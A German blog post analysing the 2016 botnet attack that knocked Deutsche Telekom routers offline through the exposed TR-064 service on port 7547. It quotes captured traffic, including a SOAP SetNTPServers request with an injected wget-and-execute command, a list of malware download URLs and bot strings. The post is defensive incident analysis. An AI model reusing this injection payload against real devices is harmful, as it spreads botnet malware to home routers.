Großangriff auf Router der Telekom

Großangriff auf Router der Telekom
Photo by Compare Fibre / Unsplash

Es war nur eine Frage der Zeit, bis jemand auf die Idee kommt einen Dienst, der nicht einmal mit einem Passwort abgesichert ist, für seine Zwecke zu nutzen.
Gestern fielen ca. 900.000 Kunden der Telekom wie auch einige Dienste der Bundesregierung und des BSI (die ebenfalls von der Telekom verwaltet werden) einem breit aufgestellten Angriff zum Opfer. Dabei war dieser nicht einmal eine besondere Herausforderung.
Allerdings war dieser Angriff überhaupt nicht gegen die Telekom und seine Kunden gerichtet. Vielmehr handelte es sich um Auswirkungen eines Angriffs eines Botnetzes gegen Kunden des irischen Providers Eir. Auch deutsche Kunden waren davon betroffen. Doch die Router der Telekomkunden sind für diesen Angriff eigentlich nicht anfällig. Wiederholt sich dieser aber in kurzen Abständen, stürzt der Router ab. Die Folge: Telekom Kunden kommen nicht mehr ins Internet!

Doch was sollte überhaupt durch die Hacker erreicht werden? Normalerweise verwalten große Provider ihre Kundenrouter über das Protokoll TR-069. Im Kundennetz kommt TR-064 zum Einsatz. Dieses Protokoll ist bei Telekom-Kunden (aber auch einigen anderen Providern!) direkt aus dem Internet für jeden erreichbar und könnte dazu verwendet werden, die Konfiguration des Routers zu verändern.
Wir haben zur Analyse des Telekom-Ausfalls einmal den Port 7547 an unserer Firewall geöffnet, und beobachtet, welche Pakete an unserer pfsense aufschlagen. Dazu haben wir einen ncat-Listener geöffnet und die Daten in eine Datei umgeleitet. Hier ein kurzer Ausschnitt:

cd /tmp;wget http://ntp.timerserver.host/1;chmod 777 1;./1

Nach diesem Muster wird immer wieder versucht ein Script nachzuladen und auszuführen. Die folgenden URLs wurden uns so bekannt:

http://5.8.65.5/1
http://5.8.65.5/2
http://l.ocalhost.host/1
http://l.ocalhost.host/2
http://l.ocalhost.host/3
http://l.ocalhost.host/x.sh
http://ntp.timerserver.host/1
http://p.ocalhost.host/x.sh
http://timeserver.host/1
http://tr069.pw/1
http://tr069.pw/2


Durch Aussperren des Providers kann das Botnet sich auf den irischen Zyxel-Routern ungestört erweitern. Hier noch einmal ein Teil unseres Mitschnittes:

POST /
HTTP/1.1\r\nMyname--is:
\r\nHost:
Cookie:
\r\n\r\n
http
url=
POST
/proc/net/tcp
busybox killall -9 telnetd
busybox iptables -A INPUT -p tcp --destination-port 7547 -j DROP
%d.%d.%d.%d
sigaction
abcdefghijklmnopqrstuvw012345678
PMMV
TKXZT
CFOKL
POST /UD/act?1 HTTP/1.1\r\nHost: 127.0.0.1:7547\r\n
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n
SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers\r\n
Content-Type: text/xml\r\n
Content-Length: 526\r\n\r\n
u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1">
NewNTPServer1:'cd /tmp;wget http://l.ocalhost.host/1;chmod 777 1;./1'\r\n


Die Telekom hatte also großes Glück, daß die Router nur abstürzten und kein neues Botnet aufspannten. Allein in Deutschland fanden wir mehr als 3 Millionen potentielle Kandidaten für diesen Angriff. Diese verteilen sich in Deutschland über die Top 5 Provider wie folgt:


Deutsche Telekom AG 2,922,468
Versatel Deutschland 2,914
QSC AG 2,773
Vodafone DSL 2,282
EWE-Tel GmbH 2,001


Bereits 2014 wurde diese Schwachstelle auf der DefCon ausführlich angeprangert.Inzwischen wurde eine neue Firmware an die meisten Router ausgerollt. Von der Telekom wird erklärt, daß ein einfaches Aus- und wieder Einschalten das Problem behebt. Dies ist auch soweit richtig, da die Router beim erneuten Einschalten der Telekom ein neues Zeitfenster geben, in welchem sie eine neue Firmware auf die Router einspielen können, falls sie bis dahin nicht bereits erneut dem Angriff zum Opfer gefallen sind.
Weiterhin heißt es, es seien keine Daten in die Hände der Kriminellen gelangt. Dies ist nach Analyse der Malware ebenfalls richtig. Unglücklicherweise existiert ein passendes Metasploit-Modul bereits seit zwei Wochen. Mit diesem könnte erreicht werden, die VoIP Zugangsdaten der Kunden zu exfiltrieren und künftig auf Kosten dieser Telefonate zu 0900-Nummern aufzubauen, an denen wiederum die Kriminellen kräftig verdienen würden.

Sollten Sie Zweifel haben, ob ihr Anschluß sich ebenfalls von aussen leicht erreichen läßt, bietet heise einen kleinen Test an, der anzeigt, ob die Fernkonfiguration durch den Provider auch anderen zur Verfügung steht.